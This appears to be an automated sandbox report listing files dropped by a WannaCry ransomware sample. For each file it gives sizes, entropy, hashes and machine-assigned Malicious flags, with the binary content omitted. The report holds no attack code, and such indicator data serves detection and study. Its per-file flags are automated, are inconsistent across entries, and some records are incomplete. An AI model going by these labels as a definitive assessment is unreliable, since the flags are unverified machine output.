                                                  Encrypted:false
                                                  SSDEEP:6:bkE0z/g2ZkM8eGJC0U6LJPlaMC32Q3DNAEdMDDltIkBQEswjm:bkEg/jZkHeAmVMCrTMDDlbhC
                                                  MD5:FA7090F96D28443C812678ED736C9B45
                                                  SHA1:471FAF76E41C202232E1FD92A67626A00D7AB479
                                                  SHA-256:7E2649727062FCEF83C331F2E1620B55091848DB6A4FEA994A94CB48A3CEC845
                                                  SHA-512:0606119C4F571A6C9D0C74C467707F79FEDDA3A4BCCDD0430C96C2AEEF62983BC83FED6E7BDB2E977AA453FF13B83452B2D6BF27CBF7057010D005AE1CEF91E6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):115848
                                                  Entropy (8bit):7.998377237649061
                                                  Encrypted:true
                                                  SSDEEP:3072:/LxCI8stKMTkZukqheYKd5siQf1lu4b734:DII8OKikZchexONv34
                                                  MD5:F75786242A504A40893E782E6643B1F7
                                                  SHA1:F74E6AF967D91498F384776374A151DC8A2D03BE
                                                  SHA-256:534E3B91E2C7DA290B00C5A22ACAE707C4672940A1248F4DF9101FD3512022AC
                                                  SHA-512:051E7BE4F3235B71E710B402C3771E4A0489262EB3BE39FB6F5D749E7015B621EB51B313B146DBE108CE584BF93E9D05889FC10291D2BE7731DC274150C87682
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):115848
                                                  Entropy (8bit):7.9984923407272985
                                                  Encrypted:true
                                                  SSDEEP:3072:auuAksAy+Jgyb1tkKZt54BcR058Uc9l/+k:duAZ+2ybDko/XU8V
                                                  MD5:F5A48721DD66A6309CABD22A481BBACD
                                                  SHA1:4F948975567E1EAADAB6089036BEAD3131A4E2D6
                                                  SHA-256:972BB75BA461D62E1CADC5BCFE4CA1AA551D75D0EA11784C3BABBAE62FBBCEB0
                                                  SHA-512:E36A847965C5BEDBCDBF9ABE93D85EB2652597F79B5F962A742BC8E5A2CCC442980FCA5FB3699BC34F323B4E3A666123FC0A0D2F6918F33ACA11F8BE1DAD0BDC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998476469829722
                                                  Encrypted:true
                                                  SSDEEP:3072:WnfhCZPPsa8w/JeAIqATAV0NqCZb3AQqX5Qa:ofhCBsaFxeAbV0NfMQ65Qa
                                                  MD5:50AE92137338BBA0C8C01F3468D9E1FE
                                                  SHA1:09029EE3578D9317970EB9F4BAD75260CAC5ADCB
                                                  SHA-256:22B9EDC632747B3FF2B36042DB966A3D3C94000EF5BB744AE9FF0D209E6802AD
                                                  SHA-512:2E01E82D1C5709E780235F0B48A14CDEBECF54DA3FDF7E2AFE32665FDDDCECC0D270875FDDB52CA166AAA114009C1B5964F61566AB1C2363782772043B95D450
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998232436732257
                                                  Encrypted:true
                                                  SSDEEP:3072:M6LximSsgSdFi3NO+SIzP9eUCp9sWnh9oYF7E:ZNiav2NOWP97uSej7E
                                                  MD5:3D4A4588471E93890C28287305B326AF
                                                  SHA1:252D9CDA8609EED48DBFA8515066CBE33D1CD062
                                                  SHA-256:0AB0EFDAA75BE866AAFE115686BC67DC2D0A555E4B5A7995D9193A39D76423EA
                                                  SHA-512:2C2D9E757ED2C6A2C0B1118F6ED9B9F347AF1DBA9568377F82F5FB5C94F7F49D824A2E88A1F39ABE65E0F69865AEF9DC006E9A6FD2AE27D83F5C24B3937BCF1B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998395844064861
                                                  Encrypted:true
                                                  SSDEEP:3072:YZ3QGlCdIuI9LZXdLVl9ERrujqamdGulzmApndNBI:YGGduI9VXdLVgaCtVdNBI
                                                  MD5:BA9F8069B91187A9C959D395B88E043E
                                                  SHA1:E5AE9CAB771DF155664D9FAEF7EBF3FC9CEA55AD
                                                  SHA-256:D8CCE2ADC2DAF19E0B574531D802D0013A87DE93696134C9E788C0A986928652
                                                  SHA-512:87FE38124E5FE0E1EC78FE0CA7469065F12212AF9FF08727C5E5DD119639C5D5CC8EAB26478D8FE2B3BAEE42741AA8A64711458CEA9DA8C0020DDD8A9DA3E413
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998277506079741
                                                  Encrypted:true
                                                  SSDEEP:3072:IetzI9nslYegg24MDfNWtS1l1MaJG8L7+WTm:IcunS0UtS1DMeGKy
                                                  MD5:DA9B6D9DA80F8C4413EA37357608C442
                                                  SHA1:7BABFEA22847A82ADCE61424E2BB901765428C31
                                                  SHA-256:B9F9B6F683CE2899E6A7F714197BBD3A555C879EDCF16AF273103B3BD315AA80
                                                  SHA-512:8095BF253BC784988F8242E33F75FA4ED8BC307CA6F2E9400C35C8455E17277E12C76BEE15DDD98531FA8CCC9DBF78AC607439C8A283BF1E59D306ADB0DFAACC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998572049377344
                                                  Encrypted:true
                                                  SSDEEP:1536:COWfWK4H/+Pd5HRymYJOD9RbI4jF0Mq+OqcQDuxpyJGiV1Wl0Q97VTCI8z:CuWPddRYcjIeiL9rYGE1Wlt7CV
                                                  MD5:592D2F7DC8904EDCE4DEE2EEB6018B6D
                                                  SHA1:99D1908BF39F9508AD3F7B6C85FAB3951428CC7F
                                                  SHA-256:EEF24852772FE3DBD906272D80F4DFACFAD6B8D5DC59A41D50D0391188026FAD
                                                  SHA-512:ACE6349F81040077214ABEEE05A216B863D76B6408C4E2CFCE898F7D946404AEDCCF2A4640D751B24B81A315534F129D31574E6F89A98C66FAE32DB7BE84DA30
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [encrypted binary content omitted]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):690472
                                                  Entropy (8bit):7.999708855093496
                                                  Encrypted:true
                                                  SSDEEP:12288:xKIdDmmA7Xc23KltAZ66ggEkDrRgUp4QnQy2509cBYnyQiJlXv:xKItmqlqf9DFgn09SYyvJZv
                                                  MD5:26252CA5C0E8985BFFCD718988E40BEC
                                                  SHA1:0EEDEFC9EC1B5026B88C80AC854B2A4BF7819911
                                                  SHA-256:D2CBDC183BD6F7826FB5A13C52B425E3F0AFF9AE9492E6EB66000F87ACAC06F2
                                                  SHA-512:529B1A92271C4D4DFFF03E1412E6499E1F190D4848F009341215D79F294144289A7E344AF7CA0F92EC7F0E761E0F782DC90C9223FE61DB3F3F7D85427F627A96
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1816
                                                  Entropy (8bit):7.877670034236576
                                                  Encrypted:false
                                                  SSDEEP:48:bkSbFEVV24XZgd/r9MkliTsDEXAuANSPEoSyCxvNExvSHGI:oUOnXqj9MkliTq7SPET3HExvSHz
                                                  MD5:CF2B9581C8B2D6D0FAC71AD2D0273B94
                                                  SHA1:425DFE9798E84082EC33A78230D50AC05015C005
                                                  SHA-256:082C7578A170B9AB67CE4122AA766A84731AD19F74E76256CFD7C98E48AEC163
                                                  SHA-512:1B63B6441B029BEE5F12841EA316642A03F284D13964CF61C75F7F2C76EC0B8C2506F896651F0D00DCCD477FF5357685AB779046CB43924239A73BA9451EFA2B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):568
                                                  Entropy (8bit):7.509341209212675
                                                  Encrypted:false
                                                  SSDEEP:12:bkEvew4mAnUFn80CRAC0NK9pL5vzVz9P80WWe87yxY7eKBqNYTPPn:bkNw4nnk80CGC0gL5n1WO7yxYqJO
                                                  MD5:17DBED0FC92D346F62322DF0E5E9EAE3
                                                  SHA1:E77D11EBCF494E375ADF66435BCB4E572FEFF109
                                                  SHA-256:B4795D652A8F2FC9D406180145C5A576208C40D29A1FA4F5C5B80D00A01A5F2A
                                                  SHA-512:D79CDD8D004C7B19B68FDC76F3AF74C1172290EE8857923E6270CA7ED03958F4C1909E75CFF30AA885D46DCA0807A008D27E8DA9E0A578265FEE5F829DD316A3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):273704
                                                  Entropy (8bit):7.999362519832665
                                                  Encrypted:true
                                                  SSDEEP:6144:3Bs7ILBWC8/DEwXB4VvstQPyKqaYqb67acjRsx4g2X+VoK:xHLBkDIfEqm7T85VoK
                                                  MD5:C03C51161BC64D1AA94D0CEFFA788DBF
                                                  SHA1:1BE5756F66A0CEDD7E8459D8FF57021837B32BC6
                                                  SHA-256:F92CCDC5E6FEB40D2B7451EAB1AF40AC15FEAE77F55A3FD568D8DEA14D8475A5
                                                  SHA-512:EE77AA618C0DB5842E8D605B22236376F4B4AE97986F3F02ED2F182D5E61BA7302205E0FD454BAF4E859154424BE8E4A8EE2532E5D81F9EE8E676DAD241D6FAD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):246824
                                                  Entropy (8bit):7.999235805778599
                                                  Encrypted:true
                                                  SSDEEP:6144:Xevrkpy+mMR5tnqXH1wgiWG1sT/BAaQYs8efn+WTNN8W0uc:XevrkpzR5tnKT/yyaWWTNN8WO
                                                  MD5:9AFE1DC2940457CB891B665DC5524BA7
                                                  SHA1:570B87ED270AA694C6EF3FCC1A0D725B850FC514
                                                  SHA-256:0A21E8605BC9E26D5484DD905D4C47797590C42965E55BDF699E9E312AD03CD4
                                                  SHA-512:FB30E8E722141C36EDAB9F080B2300F2F81F1DDFD1A1C6CDA3886FD8A8953011F0E5103F0945740C7D8F545FA515D13B450613616E7A78F654A95893E96ACE03
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):394984
                                                  Entropy (8bit):7.999547824092546
                                                  Encrypted:true
                                                  SSDEEP:12288:kzXaBdvyuzLIjEERpf5R8DjT8Vllf5mXYBkCWbg:kzXij6D00TmIQ0
                                                  MD5:7651F27F5C508E1BA6164550A34DB967
                                                  SHA1:78EAECD1649554C9BADD234C6DC617B4C0470A4B
                                                  SHA-256:F3728037B254E5C8B30632D661F8ABFA87BFEBA37B2D1A2470D4D670088A6635
                                                  SHA-512:73977D984879E41C42F83977A2B02AC800B9934FAEF95A9950E1605EB8B9845AA6676BCF77305E953F519AC77FCE6B0D5544D7BAAECDFC49DD4AB21C0D3C8DF0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25192
                                                  Entropy (8bit):7.992575960635192
                                                  Encrypted:true
                                                  SSDEEP:384:luBo4Gay83W3BHocGqJffNowX7e3KJjxFULLDRWU25cBa5V7Qs6yXwsHQHbd9Z58:WLGQG3BrlJNow7xUPecBa5VHXzm76fuM
                                                  MD5:AA3B20898E69D0BBB0CC0D036FB984A9
                                                  SHA1:BECDD345F2D8CAEE2B1B825F8FFFB3633B88B1ED
                                                  SHA-256:AE9B4FA858EE57B0ECEA3EEF286DD269DC810F0464EB0AEB6D16A0014BD24B26
                                                  SHA-512:91504204389DE618B0F4879D51F3B41E1EE463913826E09146ECEE023E1E6E25866FAB24ED238C36B2E039839691ABAB088CCADD7CD76F2D48A0EA0C66D98F3A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25192
                                                  Entropy (8bit):7.993655517996397
                                                  Encrypted:true
                                                  SSDEEP:384:GQoNgVsIbhHFFA0fqxtSFYCSWjxz0c8rDM6Iaq5tregyu4jAlJ9v1UIyZSaC:LoysiLqwdzUvM6IaAtCAl3+Xg
                                                  MD5:E96E2364C51CFC4D6BA13ABAD2DD54E9
                                                  SHA1:EF4F2AA9E7398991751D86864873D2F93CF384C6
                                                  SHA-256:77A3F7069AF8329E61BE21ABA45DA76B8E74F3BAB8422A0ACD1561767CBF9055
                                                  SHA-512:E42DCE2A1BC0C2C2DF7CBA0F405A354BD4D03F312629D1773785AF9186F7EB7EBA907FA441DB494EE65ECC192E00B51885BE6AE18EA54360A9DCD69B5B427179
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):77560
                                                  Entropy (8bit):7.997642881789174
                                                  Encrypted:true
                                                  SSDEEP:1536:vhgEXgkVGtEx4ub4DLDzEt7qUpn3b1uKdPOnG7aT8x8THQFb7taTxm2+tNLU:JtkW4DHM3pn3YKdmnov8M+AU
                                                  MD5:779BF9E145CBDC4ADBD8D55998038D09
                                                  SHA1:7AE0BBC54262875A32EF7083DF316DA79BB90A77
                                                  SHA-256:A07ACADF2D82264D67489A906F4A88BF158FFF77D9E5DD1A6FF8463FBEF56099
                                                  SHA-512:F75E945EE3C3CA3DF8663214472AA9BFA568FE059F952D9841E888D4DCE965A1A500A7EA83B11E688996B9ECA54A65BFE306385F459FBCA113E92DE8BBD850CB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!...
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:OpenPGP Public Key
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.799921555501172
                                                  Encrypted:false
                                                  SSDEEP:24:qucE/o/2oDShx9qS+zu8OutH4BMa3GSqPg6qL8ue2/vjQhg:q3uUSha1zuxGXPZmem
                                                  MD5:DF4AA61F413063D04995DCF91F674D1E
                                                  SHA1:C2AFA5936CCAC4043DF376EBE004887EDB35C4D5
                                                  SHA-256:3C9A6740782AA91F7F72E203B6883359A409AE591B697651B43A3C8A2C004A4B
                                                  SHA-512:E856F14F7C4C3F61D3E1D7BBF21AED404716555CEB5FFA6519FFB305241F1213D61FEC1FD374BEE97359A3135F49B4628A84CD02307FFB821ECD210B49FA2DA2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.825044871503022
                                                  Encrypted:false
                                                  SSDEEP:24:5AvgJmSNZj6YiA4JGHFXJbL7Um8Y+i0e6YyMyVC02w:evgJmQOAtZJfINY+G6YyMEh
                                                  MD5:BCC0779388487EF6F69C9B1D479E713C
                                                  SHA1:0D113DAAB6BA8A93B5381EF0433DC52BFDDFEA44
                                                  SHA-256:FAC97E995D83AECBB71576223E0E917335E4788AFCF66058EDEF1C5EF4E58D62
                                                  SHA-512:0C4734F7FA1B4A845F4882A93ABE94683FDA565DF39ACC6FB76A469196F422EA71F779F51AA9BEBA63266331B7A1AB648FF98798B6AF87AC5014EE0A01B8F884
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80440826011533
                                                  Encrypted:false
                                                  SSDEEP:24:A+3kiKL/6QBiSYV1FKPqatxul8dfLaqAAbfnW/xp2GgH:A+0//6Liq/mdGgbfnW/x4
                                                  MD5:12EA2208D6C0B8FF88A3DAEEDB6664EC
                                                  SHA1:0BD3BAA4B5D07CC9C6FE03AB03578C6CED7C675C
                                                  SHA-256:30E40311A5DA56B950E9B1AACD3E80D65DC8FAB3F5F0532E182234C19CFC8D0C
                                                  SHA-512:49204C016A91E16273D67DEE37F5AA3AD20E6B09A8937D57239CE6E93ED471F3C6A66A9CD10BA514064F47B14357478A8867073DEC88A042CF78F55DBFB46676
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805428173096447
                                                  Encrypted:false
                                                  SSDEEP:24:QmGYGywT47l5zenulYUDGRpq1FDApRj1Br8jqy:QdhywYakGRWF0f1mjt
                                                  MD5:A6380DB5FBCDAE0BD6936F3FE846F45A
                                                  SHA1:49ACEEB0D348BE85272692EE54453CF2430DF1E7
                                                  SHA-256:CD84DCC255564CAE182304573309C2D5AB7F6313B82FC87FA8D713F05F500E5E
                                                  SHA-512:28D689A53A54DB40AB90EF31988D6079781D2029CC1D349D273EB82B578C4F1F54AEDBFE4FB77D6815563AF6C5C058B11936E94C6AD2B473AA61C1CEB4FBF4CB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.802905153358807
                                                  Encrypted:false
                                                  SSDEEP:24:mFlZaLqINNM7vad6xWRIieMh50uHM6ceLbnnXMq:m1aLqINNSad6xWRIiDh5Zs8n8q
                                                  MD5:6956AB587CC992071A6C4F586D677948
                                                  SHA1:04D586ACA852F4412DE330A0998F49F704A0EFC6
                                                  SHA-256:E104E1C1A6532BC1ADCE6FCAD376134DFCB5BB97E6CEC589D08BBDA0FAD68A23
                                                  SHA-512:AA271610BE37E0925B4282592DD8D7470EDB367DBA2D749C848B59719DA12C046B041CE97DB3170B238A735C48EFE919F091EEEE3D6A00CD351B56D95C31E2C5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.822510363879958
                                                  Encrypted:false
                                                  SSDEEP:24:lpEWqPNgGPxlcblmfaCJZcbSx66KjZE3XH2JnA9mQsMikNxJV:fbql/glmNJZiSjX2Zo7EK
                                                  MD5:5D7F1BDA9DF0FEC50FAD1C766526A4FC
                                                  SHA1:CA18AEDB6898EE6774D1B9CD58F050BC698B7863
                                                  SHA-256:D60B4B8CD438FC833563F66BF313DD4961A843B36D4D6DE6CC329EEA27105D76
                                                  SHA-512:948E1819FCB41C48824B78C8D2CFFDEFC0504EF137B7CE45E3A0C768907760163D8B02429CAB5C4DE6CD406E5C1F8CF0A4C03CC93064B5E744D5966749151D61
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.79388529309449
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820132533577611
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820494558970135
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80676028200717
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.808252857964589
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.826350738111068
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.816488491819429
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7961263472074664
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.815272944964872
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7895203033273255
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.8028171231414705
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7891074325900505
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.81632071911657
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805035461004647
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.847505072532563
                                                  Encrypted:false
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.827279835381131
                                                  Encrypted:false
                                                  SSDEEP:24:CSD5ouH3AGSjN79UQV/XgUBPif6V/e4bNZ9KIbr1+imLp:CYH3tM9p/QmPoh4hZPJml
                                                  MD5:ADE09F57ADE0A92EDFE626F98208C440
                                                  SHA1:BA547705FFEEC6B8D176ED8B1D119BD7349E921C
                                                  SHA-256:798E1AEC3C39211C8F2C70547C305C6E10108A7A7C7782612E1C475C92B98D3A
                                                  SHA-512:49A62E9585C2668B0A13040C2E6356CAFA29BDA9F98033766F86134019D1E67001A7465BAABDE433CCB00FE0D86579360B072C38593BC18573E23FFE9D7C36B0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813197753571645
                                                  Encrypted:false
                                                  SSDEEP:24:BzB8zp47kWFOTLz3yiVhUQ04AiDqMgvvHJuRU/4DHtsQiGdLdJ:Bd8zp47wTLbyiVuQkiDqMYH8RUwpsGN
                                                  MD5:E7052018C1BE7B7677F78ADE82211F90
                                                  SHA1:09EF9694FFA1F1DDC0F0282BEB99DE007DA1B8A5
                                                  SHA-256:25BFD3CCD1DFF80E4F2A602F5B71E9B173F42791655629179E4C6F842CEC44F5
                                                  SHA-512:ECA28F7D61C5E7FAF470678F987232B9D9548E68C9383203CF2591922D46634AF8187B844B9F0F23A28961EB8E74DBDF65CB2D0ED97FB6DB967507187C4B2EEC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820916599091204
                                                  Encrypted:false
                                                  SSDEEP:24:5O1kiFV7z2wSVqmn0t/mTaNqj/hQ4xOqXkGeP8dCnXfXsWlfQajL:M1kmiIt/rqjO4xu6CnvlfzjL
                                                  MD5:9269F2A78EA195E3DDAF8439CB6CF218
                                                  SHA1:1F6FD3935FEC71946192D9D03FA1B8304E35D93E
                                                  SHA-256:E17675BA873A3B28FDA9D70183C24C369C1D1FEFE8AD9912B2F0EC0DD8FC4FC0
                                                  SHA-512:947F0B3F62CA1B73B25C24BA5B21651D7EA126EF2621FA33787653BCD97D4D1E2188FE087186BBAA7D84A327B54C2B5F9EFE5D2F1B0BC44C35CC732801212FE4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6223568
                                                  Entropy (8bit):7.999269544491864
                                                  Encrypted:true
                                                  SSDEEP:98304:rJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyk:t
                                                  MD5:8185E422B95FD15C2E069EE8C92C1914
                                                  SHA1:C5CEADE352DDBC353C49CDF9963DB634A1B6DF51
                                                  SHA-256:E44CE2AE7E255DBDFE9B4CA81DDA46DAF65194414D095A9AD6F79026B4A51307
                                                  SHA-512:5469F0ABB3E13867067190FE33D45FB14A54A08DA206C0D0FCFB0519B8F0CE11AEE31DD945981D6DF9388D3449A487A7D2902A740D53603B894D565651CEC20D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.76968202850599
                                                  Encrypted:false
                                                  SSDEEP:24:rJma9DfS/rKJMifTHs+plIgi3jDIihV8IdgE:rJLtKzKvTHp53CC3E
                                                  MD5:79E68F1DCC5E07C5FBABAD70553F522C
                                                  SHA1:A0C6FD94C8E0BD670C1B32194DF55C4E7D49A317
                                                  SHA-256:E3AFA68887AB4FC363E29A0B074E8BC8BB6F187CB9243EFD8DACFC8FBF868E9A
                                                  SHA-512:DA71F5EB73AEAAF1295D602CEC68A4C2251ED7AA2FEE02DDDC39CF8BDB4D952E6975A99FF956199F69A1F8A1EB437BE52CDED43D00C437AB2C1AA4676885A5CC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.832741916318372
                                                  Encrypted:false
                                                  SSDEEP:24:H43gtwCmQg2DcT31E2iLEbx5/erBbwd0ptGgqXrQQFD:pTmoD+31CLyx5/iBttGl7nJ
                                                  MD5:CFFDDB2A7B723F1893B65F6F49CA33E5
                                                  SHA1:8D6492AE40DDC55F60CE73732001EE37B1E07A73
                                                  SHA-256:653E4D8D5D307651578323A7CBAE9C59A7AE1A76C95D84DB49E32D7B5B8AAE5A
                                                  SHA-512:EC65305B9805634B3C1DE2C0DA4ABBE78CEC1D233653F7D1E554B92C9C0E26D681A0C05CC0CA16B3521A8A3AFCC764BC74DEE73FB58A951651624C698B8F7586
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:OpenPGP Secret Key
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.792760690895553
                                                  Encrypted:false
                                                  SSDEEP:24:Sz/F7EyhEqItP3JXovsgi3KqQIcpe2GglqtmC80i+l3MWYViI8or1:SzJEyh/ItykhP3cpe2Smx0i+Sicr1
                                                  MD5:E30D97EE5934E9889D663FA21BFFFB42
                                                  SHA1:277F5C25B363AFF68D01410EC4D6DEE0B2BAAD2A
                                                  SHA-256:D47167585F8326B885F16C6B61BBB07BD037F8C1FE01F72A3851DE903D1D7433
